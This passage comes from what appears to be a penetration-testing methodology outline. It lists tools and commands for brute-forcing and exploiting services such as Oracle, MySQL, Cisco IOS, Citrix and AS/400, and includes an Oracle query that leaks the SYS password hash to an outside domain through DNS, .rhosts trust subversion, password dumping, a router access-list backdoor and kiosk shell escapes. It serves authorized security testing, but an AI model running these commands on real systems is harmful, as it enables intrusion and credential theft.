4.17.1.3. Manual Login

4.17.1.3.1. rlogin hostname -l username

4.17.1.3.2. rlogin <IP>

4.17.1.4. Subvert the files

4.17.1.4.1. echo ++ > .rhosts

4.17.2. Rlogin Brute force

4.17.2.1. Hydra

4.18. rsh port 514 open

4.18.1. Rsh Enumeration

4.18.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

4.18.2. Rsh Brute Force

4.18.2.1. rsh-grind

4.18.2.2. Hydra

4.18.2.3. medusa

4.19. SQL Server Port 1433 1434 open

4.19.1. SQL Enumeration

4.19.1.1. piggy

4.19.1.2. SQLPing

4.19.1.2.1. sqlping ip_address/hostname

4.19.1.3. SQLPing2

4.19.1.4. SQLPing3

4.19.1.5. SQLpoke

4.19.1.6. SQL Recon

4.19.1.7. SQLver

4.19.2. SQL Brute Force

4.19.2.1. SQLPAT

4.19.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack

4.19.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack

4.19.2.2. SQL Dict

4.19.2.3. SQLAT

4.19.2.4. Hydra

4.19.2.5. SQLlhf

4.19.2.6. ForceSQL

4.20. Citrix port 1494 open

4.20.1. Citrix Enumeration

4.20.1.1. Default Domain

4.20.1.2. Published Applications

4.20.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]

4.20.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]

4.20.2. Citrix Brute Force

4.20.2.1. bforce.js

4.20.2.2. connect.js

4.20.2.3. Citrix Brute-forcer

4.20.2.4. Reference Material

4.20.2.4.1. Hacking Citrix - the legitimate backdoor

4.20.2.4.2. Hacking Citrix - the forceful way

4.21. Oracle Port 1521 Open

4.21.1. Oracle Enumeration

4.21.1.1. oracsec

4.21.1.2. Repscan

4.21.1.3. Sidguess

4.21.1.4. Scuba

4.21.1.5. DNS/HTTP Enumeration

4.21.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL

4.21.1.5.2. Untitled

4.21.1.6. WinSID

4.21.1.7. Oracle default password list

4.21.1.8. TNSVer

4.21.1.8.1. tnsver host [port]

4.21.1.9. TCP Scan

4.21.1.10. Oracle TNSLSNR

4.21.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]

4.21.1.11. TNSCmd

4.21.1.11.1. perl tnscmd.pl -h ip_address

4.21.1.11.2. perl tnscmd.pl version -h ip_address

4.21.1.11.3. perl tnscmd.pl status -h ip_address

4.21.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)

4.21.1.12. LSNrCheck

4.21.1.13. Oracle Security Check (needs credentials)

4.21.1.14. OAT

4.21.1.14.1. sh opwg.sh -s ip_address

4.21.1.14.2. opwg.bat -s ip_address

4.21.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID

4.21.1.15. OScanner

4.21.1.15.1. sh oscanner.sh -s ip_address

4.21.1.15.2. oscanner.exe -s ip_address

4.21.1.15.3. sh reportviewer.sh oscanner_saved_file.xml

4.21.1.15.4. reportviewer.exe oscanner_saved_file.xml

4.21.1.16. NGS Squirrel for Oracle

4.21.1.17. Service Register

4.21.1.17.1. Service-register.exe ip_address

4.21.1.18. PLSQL Scanner 2008

4.21.2. Oracle Brute Force

4.21.2.1. OAK

4.21.2.1.1. ora-getsid hostname port sid_dictionary_list

4.21.2.1.2. ora-auth-alter-session host port sid username password sql

4.21.2.1.3. ora-brutesid host port start

4.21.2.1.4. ora-pwdbrute host port sid username password-file

4.21.2.1.5. ora-userenum host port sid userlistfile

4.21.2.1.6. ora-ver -e (-f -l -a) host port

4.21.2.2. breakable (Targets Application Server Port)

4.21.2.2.1. breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose

4.21.2.3. SQLInjector (Targets Application Server Port)

4.21.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL

4.21.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle

4.21.2.4. Check Password

4.21.2.5. orabf

4.21.2.5.1. orabf [hash]:[username] [options]

4.21.2.6. thc-orakel

4.21.2.6.1. Cracker

4.21.2.6.2. Client

4.21.2.6.3. Crypto

4.21.2.7. DBVisualisor

4.21.2.7.1. Sql scripts from pentest.co.uk

4.21.2.7.2. Manual sql input of previously reported vulnerabilties

4.21.3. Oracle Reference Material

4.21.3.1. Understanding SQL Injection

4.21.3.2. SQL Injection walkthrough

4.21.3.3. SQL Injection by example

4.21.3.4. Advanced SQL Injection in Oracle databases

4.21.3.5. Blind SQL Injection

4.21.3.6. SQL Cheatsheets

4.21.3.6.1. Untitled

4.22. NFS Port 2049 open

4.22.1. NFS Enumeration

4.22.1.1. showmount -e hostname/ip_address

4.22.1.2. mount -t nfs ip_address:/directory_found_exported /local_mount_point

4.22.2. NFS Brute Force

4.22.2.1. Interact with NFS share and try to add/delete

4.22.2.2. Exploit and Confuse Unix

4.22.3. Examine Configuration Files

4.22.3.1. /etc/exports

4.22.3.2. /etc/lib/nfs/xtab

4.22.4. nmap nse script

4.22.4.1. nfs-showmount

4.23. Compaq/HP Insight Manager Port 2301,2381open

4.23.1. HP Enumeration

4.23.1.1. Authentication Method

4.23.1.1.1. Host OS Authentication

4.23.1.1.2. Default Authentication

4.23.1.2. Wikto

4.23.1.3. Nstealth

4.23.2. HP Bruteforce

4.23.2.1. Hydra

4.23.2.2. Acunetix

4.23.3. Examine Configuration Files

4.23.3.1. path.properties

4.23.3.2. mx.log

4.23.3.3. CLIClientConfig.cfg

4.23.3.4. database.props

4.23.3.5. pg_hba.conf

4.23.3.6. jboss-service.xml

4.23.3.7. .namazurc

4.24. MySQL port 3306 open

4.24.1. Enumeration

4.24.1.1. nmap -A -n -p3306 <IP Address>

4.24.1.2. nmap -A -n -PN --script:ALL -p3306 <IP Address>

4.24.1.3. telnet IP_Address 3306

4.24.1.4. use test; select * from test;

4.24.1.5. To check for other DB's -- show databases

4.24.2. Administration

4.24.2.1. MySQL Network Scanner

4.24.2.2. MySQL GUI Tools

4.24.2.3. mysqlshow

4.24.2.4. mysqlbinlog

4.24.3. Manual Checks

4.24.3.1. Default usernames and passwords

4.24.3.1.1. username: root password:

4.24.3.1.2. testing

4.24.3.2. Configuration Files

4.24.3.2.1. Operating System

4.24.3.2.2. Command History

4.24.3.2.3. Log Files

4.24.3.2.4. To run many sql commands at once -- mysql -u username -p < manycommands.sql

4.24.3.2.5. MySQL data directory (Location specified in my.cnf)

4.24.3.2.6. SSL Check

4.24.3.3. Privilege Escalation

4.24.3.3.1. Current Level of access

4.24.3.3.2. Access passwords

4.24.3.3.3. Create a new user and grant him privileges

4.24.3.3.4. Break into a shell

4.24.4. SQL injection

4.24.4.1. mysql-miner.pl

4.24.4.1.1. mysql-miner.pl http://target/ expected_string database

4.24.4.2. http://www.imperva.com/resources/adc/sql_injection_signatures_evasion.html

4.24.4.3. http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

4.24.5. References.

4.24.5.1. Design Weaknesses

4.24.5.1.1. MySQL running as root

4.24.5.1.2. Exposed publicly on Internet

4.24.5.2. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=mysql

4.24.5.3. http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=mysql&x=0&y=0

4.25. RDesktop port 3389 open

4.25.1. Rdesktop Enumeration

4.25.1.1. Remote Desktop Connection

4.25.2. Rdestop Bruteforce

4.25.2.1. TSGrinder

4.25.2.1.1. tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address

4.25.2.2. Tscrack

4.26. Sybase Port 5000+ open

4.26.1. Sybase Enumeration

4.26.1.1. sybase-version ip_address from NGS

4.26.2. Sybase Vulnerability Assessment

4.26.2.1. Use DBVisualiser

4.26.2.1.1. Sybase Security checksheet

4.26.2.1.2. Manual sql input of previously reported vulnerabilties

4.26.2.2. NGS Squirrel for Sybase

4.27. SIP Port 5060 open

4.27.1. SIP Enumeration

4.27.1.1. netcat

4.27.1.1.1. nc IP_Address Port

4.27.1.2. sipflanker

4.27.1.2.1. python sipflanker.py 192.168.1-254

4.27.1.3. Sipscan

4.27.1.4. smap

4.27.1.4.1. smap IP_Address/Subnet_Mask

4.27.1.4.2. smap -o IP_Address/Subnet_Mask

4.27.1.4.3. smap -l IP_Address

4.27.2. SIP Packet Crafting etc.

4.27.2.1. sipsak

4.27.2.1.1. Tracing paths: - sipsak -T -s sip:[email protected]

4.27.2.1.2. Options request:- sipsak -vv -s sip:[email protected]

4.27.2.1.3. Query registered bindings:- sipsak -I -C empty -a password -s sip:[email protected]

4.27.2.2. siprogue

4.27.3. SIP Vulnerability Scanning/ Brute Force

4.27.3.1. tftp bruteforcer

4.27.3.1.1. Default dictionary file

4.27.3.1.2. ./tftpbrute.pl IP_Address Dictionary_file Maximum_Processes

4.27.3.2. VoIPaudit

4.27.3.3. SiVuS

4.27.4. Examine Configuration Files

4.27.4.1. SIPDefault.cnf

4.27.4.2. asterisk.conf

4.27.4.3. sip.conf

4.27.4.4. phone.conf

4.27.4.5. sip_notify.conf

4.27.4.6. <Ethernet address>.cfg

4.27.4.7. 000000000000.cfg

4.27.4.8. phone1.cfg

4.27.4.9. sip.cfg etc. etc.

4.28. VNC port 5900^ open

4.28.1. VNC Enumeration

4.28.1.1. Scans

4.28.1.1.1. 5900^ for direct access.5800 for HTTP access.

4.28.2. VNC Brute Force

4.28.2.1. Password Attacks

4.28.2.1.1. Remote

4.28.2.1.2. Local

4.28.3. Exmine Configuration Files

4.28.3.1. .vnc

4.28.3.2. /etc/vnc/config

4.28.3.3. $HOME/.vnc/config

4.28.3.4. /etc/sysconfig/vncservers

4.28.3.5. /etc/vnc.conf

4.29. X11 port 6000^ open

4.29.1. X11 Enumeration

4.29.1.1. List open windows

4.29.1.2. Authentication Method

4.29.1.2.1. Xauth

4.29.1.2.2. Xhost

4.29.2. X11 Exploitation

4.29.2.1. xwd

4.29.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm

4.29.2.2. Keystrokes

4.29.2.2.1. Received

4.29.2.2.2. Transmitted

4.29.2.3. Screenshots

4.29.2.4. xhost +

4.29.3. Examine Configuration Files

4.29.3.1. /etc/Xn.hosts

4.29.3.2. /usr/lib/X11/xdm

4.29.3.2.1. Untitled

4.29.3.3. /usr/lib/X11/xdm/xsession

4.29.3.4. /usr/lib/X11/xdm/xsession-remote

4.29.3.5. /usr/lib/X11/xdm/xsession.0

4.29.3.6. /usr/lib/X11/xdm/xdm-config

4.29.3.6.1. DisplayManager*authorize:on

4.30. Tor Port 9001, 9030 open

4.30.1. Tor Node Checker

4.30.1.1. Ip Pages

4.30.1.2. Kewlio.net

4.30.2. nmap NSE script

4.31. Jet Direct 9100 open

4.31.1. hijetta

5. Password cracking

5.1. Rainbow crack

5.1.1. ophcrack

5.1.2. rainbow tables

5.1.2.1. rcrack c:\rainbowcrack\*.rt -f pwfile.txt

5.2. Ophcrack

5.3. Cain & Abel

5.4. John the Ripper

5.4.1. ./unshadow passwd shadow > file_to_crack

5.4.2. ./john -single file_to_crack

5.4.3. ./john -w=location_of_dictionary_file -rules file_to_crack

5.4.4. ./john -show file_to_crack

5.4.5. ./john --incremental:All file_to_crack

5.5. fgdump

5.5.1. fgdump [-t][-c][-w][-s][-r][-v][-k][-l logfile][-T threads] {{-h Host | -f filename} -u Username -p Password | -H filename} i.e. fgdump.exe -u hacker -p hard_password -c -f target.txt

5.6. pwdump6

5.6.1. pwdump [-h][-o][-u][-p] machineName

5.7. medusa

5.8. LCP

5.9. L0phtcrack (Note: - This tool was aquired by Symantec from @Stake and it is there policy not to ship outside the USA and Canada

5.9.1. Domain credentials

5.9.2. Sniffing

5.9.3. pwdump import

5.9.4. sam import

5.10. aiocracker

5.10.1. aiocracker.py [md5, sha1, sha256, sha384, sha512] hash dictionary_list

6. Vulnerability Assessment - Utilising vulnerability scanners all discovered hosts can then be tested for vulnerabilities. The result would then be analysed to determine if there any vulnerabilities that could be exploited to gain access to a target host on a network. A number of tests carried out by these scanners are just banner grabbing/ obtaining version information, once these details are known, the version is compared with any common vulnerabilities and exploits (CVE) that have been released and reported to the user. Other tools actually use manual pen testing methods and display the output received i.e. showmount -e ip_address would display the NFS shares available to the scanner whcih would then need to be verified by the tester.

6.1. Manual

6.1.1. Patch Levels

6.1.2. Confirmed Vulnerabilities

6.1.2.1. Severe

6.1.2.2. High

6.1.2.3. Medium

6.1.2.4. Low

6.2. Automated

6.2.1. Reports

6.2.2. Vulnerabilities

6.2.2.1. Severe

6.2.2.2. High

6.2.2.3. Medium

6.2.2.4. Low

6.3. Tools

6.3.1. GFI

6.3.2. Nessus (Linux)

6.3.2.1. Nessus (Windows)

6.3.3. NGS Typhon

6.3.4. NGS Squirrel for Oracle

6.3.5. NGS Squirrel for SQL

6.3.6. SARA

6.3.7. MatriXay

6.3.8. BiDiBlah

6.3.9. SSA

6.3.10. Oval Interpreter

6.3.11. Xscan

6.3.12. Security Manager +

6.3.13. Inguma

6.4. Resources

6.4.1. Security Focus

6.4.2. Microsoft Security Bulletin

6.4.3. Common Vulnerabilities and Exploits (CVE)

6.4.4. National Vulnerability Database (NVD)

6.4.5. The Open Source Vulnerability Database (OSVDB)

6.4.5.1. Standalone Database

6.4.5.1.1. Update URL

6.4.6. United States Computer Emergency Response Team (US-CERT)

6.4.7. Computer Emergency Response Team

6.4.8. Mozilla Security Information

6.4.9. SANS

6.4.10. Securiteam

6.4.11. PacketStorm Security

6.4.12. Security Tracker

6.4.13. Secunia

6.4.14. Vulnerabilities.org

6.4.15. ntbugtraq

6.4.16. Wireless Vulnerabilities and Exploits (WVE)

6.5. Blogs

6.5.1. Carnal0wnage

6.5.2. Fsecure Blog

6.5.3. g0ne blog

6.5.4. GNUCitizen

6.5.5. ha.ckers Blog

6.5.6. Jeremiah Grossman Blog

6.5.7. Metasploit

6.5.8. nCircle Blogs

6.5.9. pentest mokney.net

6.5.10. Rational Security

6.5.11. Rise Security

6.5.12. Security Fix Blog

6.5.13. Software Vulnerability Exploitation Blog

6.5.14. Taosecurity Blog

7. AS/400 Auditing

7.1. Remote

7.1.1. Information Gathering

7.1.1.1. Nmap using common iSeries (AS/400) services.

7.1.1.1.1. Unsecured services (Port;name;description)

7.1.1.1.2. Secured services (Port;name;description)

7.1.1.2. NetCat (old school technique)

7.1.1.2.1. nc -v -z -w target ListOfServices.txt | grep "open"

7.1.1.3. Banners Grabbing

7.1.1.3.1. Telnet

7.1.1.3.2. FTP

7.1.1.3.3. HTTP Banner

7.1.1.3.4. POP3

7.1.1.3.5. SNMP

7.1.1.3.6. SMTP

7.1.2. Users Enumeration

7.1.2.1. Default AS/400 users accounts

7.1.2.2. Error messages

7.1.2.2.1. Telnet Login errors

7.1.2.2.2. POP3 authentication Errors

7.1.2.3. Qsys symbolic link (if ftp is enabled)

7.1.2.3.1. ftp target | quote stat | quote site namefmt 1

7.1.2.3.2. cd /

7.1.2.3.3. quote site listfmt 1

7.1.2.3.4. mkdir temp

7.1.2.3.5. quote rcmd ADDLNK OBJ('/qsys.lib') NEWLNK('/temp/qsys')

7.1.2.3.6. quote rcmd QSH CMD('ln -fs /qsys.lib /temp/qsys')

7.1.2.3.7. dir /temp/qsys/*.usrprf

7.1.2.4. LDAP

7.1.2.4.1. Need os400-sys value from ibm-slapdSuffix

7.1.2.4.2. Tool to browse LDAP

7.1.3. Exploitation

7.1.3.1. CVE References

7.1.3.1.1. http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=AS400

7.1.3.1.2. CVE-2005-1244 - Severity : High - CVSS : 7.0

7.1.3.1.3. CVE-2005-1243 - Severity : Low - CVSS : 3.3

7.1.3.1.4. CVE-2005-1242 - Severity : Low - CVSS : 3.3

7.1.3.1.5. CVE-2005-1241 - Severity : High - CVSS : 7.0

7.1.3.1.6. CVE-2005-1240 - Severity : High - CVSS : 7.0

7.1.3.1.7. CVE-2005-1239 - Severity : Low - CVSS : 3.3

7.1.3.1.8. CVE-2005-1238 - Severity : High - CVSS : 9.0

7.1.3.1.9. CVE-2005-1182 - Severity : Low - CVSS : 3.3

7.1.3.1.10. CVE-2005-1133 - Severity : Low - CVSS : 3.3

7.1.3.1.11. CVE-2005-1025 - Severity : Low - CVSS : 3.3

7.1.3.1.12. CVE-2005-0868 - Severity : High - CVSS : 7.0

7.1.3.1.13. CVE-2005-0899 - Severity : Low - CVSS : 2.3

7.1.3.1.14. CVE-2002-1822 - Severity : Low - CVSS : 3.3

7.1.3.1.15. CVE-2002-1731 - Severity : Low - CVSS : 2.3

7.1.3.1.16. CVE-2000-1038 - Severity : Low - CVSS : 3.3

7.1.3.1.17. CVE-1999-1279 - Severity : Low - CVSS : 3.3

7.1.3.1.18. CVE-1999-1012 - Severity : Low - CVSS : 3.3

7.1.3.2. Access with Work Station Gateway

7.1.3.2.1. http://target:5061/WSG

7.1.3.2.2. Default AS/400 accounts.

7.1.3.3. Network attacks (next release)

7.1.3.3.1. DB2

7.1.3.3.2. QSHELL

7.1.3.3.3. Hijacking Terminals

7.1.3.3.4. Trojan attacks

7.1.3.3.5. Hacking from AS/400

7.2. Local

7.2.1. System Value Security

7.2.1.1. Untitled

7.2.1.1.1. Untitled

7.2.1.2. Untitled

7.2.1.2.1. Untitled

7.2.1.3. Untitled

7.2.1.3.1. Untitled

7.2.1.4. Untitled

7.2.1.4.1. Recommended value is 30

7.2.2. Password Policy

7.2.2.1. Untitled

7.2.2.1.1. Untitled

7.2.2.2. Untitled

7.2.2.2.1. Untitled

7.2.2.3. Untitled

7.2.2.3.1. Untitled

7.2.2.4. Untitled

7.2.2.4.1. Untitled

7.2.2.5. Untitled

7.2.3. Audit level

7.2.3.1. Untitled

7.2.3.1.1. Recommended value is *SECURITY

7.2.4. Documentation

7.2.4.1. Users class

7.2.4.1.1. Untitled

7.2.4.2. System Audit Settings

7.2.4.2.1. Untitled

7.2.4.3. Special Authorities Definitions

7.2.4.3.1. Untitled

8. Bluetooth Specific Testing

8.1. Bluescanner

8.2. Bluesweep

8.3. btscanner

8.4. Redfang

8.5. Blueprint

8.6. Bluesnarfer

8.7. Bluebugger

8.7.1. bluebugger [OPTIONS] -a <addr> [MODE]

8.8. Blueserial

8.9. Bloover

8.10. Bluesniff

8.11. Exploit Frameworks

8.11.1. BlueMaho

8.11.1.1. Untitled

8.12. Resources

8.12.1. URL's

8.12.1.1. BlueStumbler.org

8.12.1.2. Bluejackq.com

8.12.1.3. Bluejacking.com

8.12.1.4. Bluejackers

8.12.1.5. bluetooth-pentest

8.12.1.6. ibluejackedyou.com

8.12.1.7. Trifinite

8.12.2. Vulnerability Information

8.12.2.1. Common Vulnerabilities and Exploits (CVE)

8.12.2.1.1. Vulnerabilties and exploit information relating to these products can be found here: http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=bluetooth

8.12.3. White Papers

8.12.3.1. Bluesnarfing

9. Cisco Specific Testing

9.1. Methodology

9.1.1. Scan & Fingerprint.

9.1.1.1. Untitled

9.1.1.2. Untitled

9.1.1.3. If SNMP is active, then community string guessing should be performed.

9.1.2. Credentials Guessing.

9.1.2.1. Untitled

9.1.2.2. Attempt to guess Telnet, HTTP and SSH account credentials. Once you have non-privileged access, attempt to discover the 'enable' password. Also attempt to guess Simple Network Management Protocol (SNMP) community strings as they can lead to the config files of the router and therefore the 'enable' password!

9.1.3. Connect

9.1.3.1. Untitled

9.1.3.2. If you have determined the 'enable' password, then full access has been achieved and you can alter the configuration files of the router.

9.1.4. Check for bugs

9.1.4.1. Untitled

9.1.4.1.1. The most widely knwon/ used are: Nessus, Retina, GFI LanGuard and Core Impact. 

9.1.4.1.2. There are also tools that check for specific flaws, such as the HTTP Arbitrary Access Bug: ios-w3-vuln

9.1.5. Further your attack

9.1.5.1. Untitled

9.1.5.1.1. running-config is the currently running configuration settings.  This gets loaded from the startup-config on boot.  This configuration file is editable and the changes are immediate.  Any changes will be lost once the router is rebooted.  It is this file that requires altering to maintain a non-permenant connection through to the internal network.  

9.1.5.1.2. startup-config is the boot up configuration file.  It is this file that needs altering to maintain a permenant  connection through to the internal network.  

9.1.5.2. Untitled

9.1.5.2.1. #> access-list 100 permit ip <IP> any

9.2. Scan & Fingerprint.

9.2.1. Port Scanning

9.2.1.1. nmap

9.2.1.1.1. Untitled

9.2.1.2. Other tools

9.2.1.2.1. Untitled

9.2.1.2.2. mass-scanner is a simple scanner for discovering Cisco devices within a given network range.

9.2.2. Fingerprinting

9.2.2.1. Untitled

9.2.2.1.1. BT cisco-torch-0.4b # cisco-torch.pl -A 10.1.1.175

9.2.2.2. Untitled

9.2.2.2.1. TCP Port scan - nmap -sV -O -v -p 23,80 <IP> -oN TCP.version.txt

9.2.2.2.2. Untitled

9.3. Password Guessing.

9.3.1. Untitled

9.3.1.1. ./CAT  -h  <IP>  -a  password.wordlist

9.3.1.2. Untitled

9.3.2. Untitled

9.3.2.1. ./enabler <IP> [-u username] -p password /password.wordlist [port]

9.3.2.2. Untitled

9.3.3. Untitled

9.3.3.1. BT tmp # hydra  -l  ""  -P  password.wordlist  -t  4  <IP>  cisco

9.3.3.2. Untitled

9.4. SNMP Attacks.

9.4.1. Untitled

9.4.1.1. ./CAT  -h  <IP>  -w  SNMP.wordlist

9.4.1.2. Untitled

9.4.2. Untitled

9.4.2.1. onesixytone  -c  SNMP.wordlist  <IP>

9.4.2.2. BT onesixtyone-0.3.2 # onesixtyone  -c  dict.txt  10.1.1.175 Scanning 1 hosts, 64 communities 10.1.1.175 [enable] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug 10.1.1.175 [Cisco] Cisco Internetwork Operating System Software   IOS (tm) C2600 Software (C2600-IK9O3S3-M), Version 12.2(15)T17, RELEASE SOFTWARE (fc1)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2005 by cisco Systems, Inc.  Compiled Fri 12-Aug

9.4.3. Untitled

9.4.3.1. snmapwalk  -v  <Version>  -c  <Community string>  <IP>

9.4.3.2. Untitled

9.5. Connecting.

9.5.1. Telnet

9.5.1.1. Untitled

9.5.1.1.1.  telnet  <IP>

9.5.1.1.2. Sample Banners

9.5.2. SSH

9.5.3. Web Browser

9.5.3.1. Untitled

9.5.3.1.1. This uses a combination of username and password to authenticate.  After browsing to the target device, an "Authentication Required" box will pop up with text similar to the following:

9.5.3.1.2. Authentication Required Enter username and password for "level_15_access" at http://10.1.1.1 User Name: Password:

9.5.3.1.3. Once logged in, you have non-privileged mode access and can even configure the router through a command interpreter.

9.5.4. TFTP

9.5.4.1. Untitled

9.5.4.1.1. Untitled

9.5.4.1.2. ios-w3-vuln exploits the HTTP Access Bug to 'fetch' the running-config to your local TFTP server.  Both of these tools require the config files to be saved with default names.

9.5.4.2. Untitled

9.5.4.2.1. ./cisco-torch.pl <options> <IP,hostname,network>

9.5.4.2.2. ./cisco-torch.pl <options> -F <hostlist>

9.5.4.2.3. Creating backdoors in Cisco IOS using TCL

9.6. Known Bugs.

9.6.1. Attack Tools

9.6.1.1. Untitled

9.6.1.1.1. Untitled

9.6.1.2. Untitled

9.6.1.2.1. Web browse to the Cisco device: http://<IP>

9.6.1.2.2. Untitled

9.6.1.2.3. Untitled

9.6.1.2.4. Untitled

9.6.1.3. Untitled

9.6.1.3.1. ./ios-w3-vul 192.168.1.1 fetch > /tmp/router.txt

9.6.2. Common Vulnerabilities and Exploits (CVE) Information

9.6.2.1. Vulnerabilties and exploit information relating to these products can be found here:http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=cisco+IOS

9.7. Configuration Files.

9.7.1. Untitled

9.7.1.1. Configuration files explained

9.7.1.1.1. The line that reads "enable password router", where "router" is the password, is the TTY console password which is superceeded by the enable secret password for remote access.

9.7.1.1.2. Untitled

9.7.1.1.3. Untitled

9.7.1.1.4. Password Encryption Utilised

9.7.1.1.5. Untitled

9.7.1.2. Configuration Testing Tools

9.7.1.2.1. Nipper

9.7.1.2.2. fwauto (Beta)

9.8. References.

9.8.1. Cisco IOS Exploitation Techniques

10. Citrix Specific Testing

10.1. Citrix provides remote access services to multiple users across a wide range of platforms. The following information I have put together which will hopefully help you conduct a vulnerability assessment/ penetration test against Citrix

10.2. Enumeration

10.2.1. web search

10.2.1.1. Google (GHDB)

10.2.1.1.1. ext:ica

10.2.1.1.2. inurl:citrix/metaframexp/default/login.asp

10.2.1.1.3. [WFClient] Password= filetype:ica

10.2.1.1.4. inurl:citrix/metaframexp/default/login.asp? ClientDetection=On

10.2.1.1.5. inurl:metaframexp/default/login.asp | intitle:"Metaframe XP Login"

10.2.1.1.6. inurl:/Citrix/Nfuse17/

10.2.1.1.7. inurl:Citrix/MetaFrame/default/default.aspx

10.2.1.2. Google Hacks (Author Discovered)

10.2.1.2.1. filetype:ica Username=

10.2.1.2.2. inurl:Citrix/AccessPlatform/auth/login.aspx

10.2.1.2.3. inurl:/Citrix/AccessPlatform/

10.2.1.2.4. inurl:LogonAgent/Login.asp

10.2.1.2.5. inurl:/CITRIX/NFUSE/default/login.asp

10.2.1.2.6. inurl:/Citrix/NFuse161/login.asp

10.2.1.2.7. inurl:/Citrix/NFuse16

10.2.1.2.8. inurl:/Citrix/NFuse151/

10.2.1.2.9. allintitle:MetaFrame XP Login

10.2.1.2.10. allintitle:MetaFrame Presentation Server Login

10.2.1.2.11. inurl:Citrix/~bespoke_company_name~/default/login.aspx?ClientDetection=On

10.2.1.2.12. allintitle:Citrix(R) NFuse(TM) Classic Login

10.2.1.3. Yahoo

10.2.1.3.1. originurlextension:ica

10.2.2. site search

10.2.2.1. Manual

10.2.2.1.1. review web page for useful information

10.2.2.1.2. review source for web page

10.2.3. generic

10.2.3.1. nmap -A -PN -p 80,443,1494 ip_address

10.2.3.2. amap -bqv ip_address port_no.

10.2.4. citrix specific

10.2.4.1. enum.pl

10.2.4.1.1. perl enum.pl ip_address

10.2.4.2. enum.js

10.2.4.2.1. enum.js apps TCPBrowserAdress=ip_address

10.2.4.3. connect.js

10.2.4.3.1. connect.js TCPBrowserAdress=ip_address Application=advertised-application

10.2.4.4. Citrix-pa-scan

10.2.4.4.1. perl pa-scan.pl ip_address [timeout] > pas.wri

10.2.4.5. pabrute.c

10.2.4.5.1. ./pabrute pubapp list app_list ip_address

10.2.5. Default Ports

10.2.5.1. TCP

10.2.5.1.1. Citrix XML Service

10.2.5.1.2. Advanced Management Console

10.2.5.1.3. Citrix SSL Relay

10.2.5.1.4. ICA sessions

10.2.5.1.5. Server to server

10.2.5.1.6. Management Console to server

10.2.5.1.7. Session Reliability (Auto-reconnect)

10.2.5.1.8. License Management Console

10.2.5.1.9. License server

10.2.5.2. UDP

10.2.5.2.1. Clients to ICA browser service

10.2.5.2.2. Server-to-server

10.2.6. nmap nse scripts

10.2.6.1. citrix-enum-apps

10.2.6.1.1. nmap -sU --script=citrix-enum-apps -p 1604 <host>

10.2.6.2. citrix-enum-apps-xml

10.2.6.2.1. nmap --script=citrix-enum-apps-xml -p 80,443 <host>

10.2.6.3. citrix-enum-servers

10.2.6.3.1. nmap -sU --script=citrix-enum-servers -p 1604

10.2.6.4. citrix-enum-servers-xml

10.2.6.4.1. nmap --script=citrix-enum-servers-xml -p 80,443 <host>

10.2.6.5. citrix-brute-xml

10.2.6.5.1. nmap --script=citrix-brute-xml --script-args=userdb=<userdb>,passdb=<passdb>,ntdomain=<domain> -p 80,443 <host>

10.3. Scanning

10.3.1. Nessus

10.3.1.1. Plugins

10.3.1.1.1. CGI abuses

10.3.1.1.2. CGI abuses : Cross Site Scripting (XSS)

10.3.1.1.3. Misc.

10.3.1.1.4. Service Detection

10.3.1.1.5. Web Servers

10.3.1.1.6. Windows

10.3.2. Nikto

10.3.2.1. perl nikto.pl -host ip_address -port port_no.

10.3.2.1.1. Untitled

10.4. Exploitation

10.4.1. Alter default .ica files

10.4.1.1. InitialProgram=cmd.exe

10.4.1.2. InitialProgram=c:\windows\system32\cmd.exe

10.4.1.3. InitialProgram=explorer.exe

10.4.2. Enumerate and Connect

10.4.2.1. For applications identified by Citrix-pa-scan

10.4.2.1.1. Pas

10.4.2.2. For published applications with a Citrix client when the master browser is non-public.

10.4.2.2.1. Citrix-pa-proxy

10.4.3. Manual Testing

10.4.3.1. Create Batch File (cmd.bat)

10.4.3.1.1. 1

10.4.3.1.2. 2

10.4.3.2. Host Scripting File (cmd.vbs)

10.4.3.2.1. Option Explicit

10.4.3.2.2. Dim objShell

10.4.3.2.3. Set objShell = CreateObject("WScript.Shell")

10.4.3.2.4. objShell.Run "%comspec% /k"

10.4.3.2.5. WScript.Quit

10.4.3.2.6. alternative functionality

10.4.3.3. iKat

10.4.3.3.1. Integrated Kiosk Attack Tool

10.4.3.4. AT Command - priviledge escalation

10.4.3.4.1. AT HH:MM /interactive "cmd.exe"

10.4.3.4.2. AT HH:MM /interactive %comspec% /k

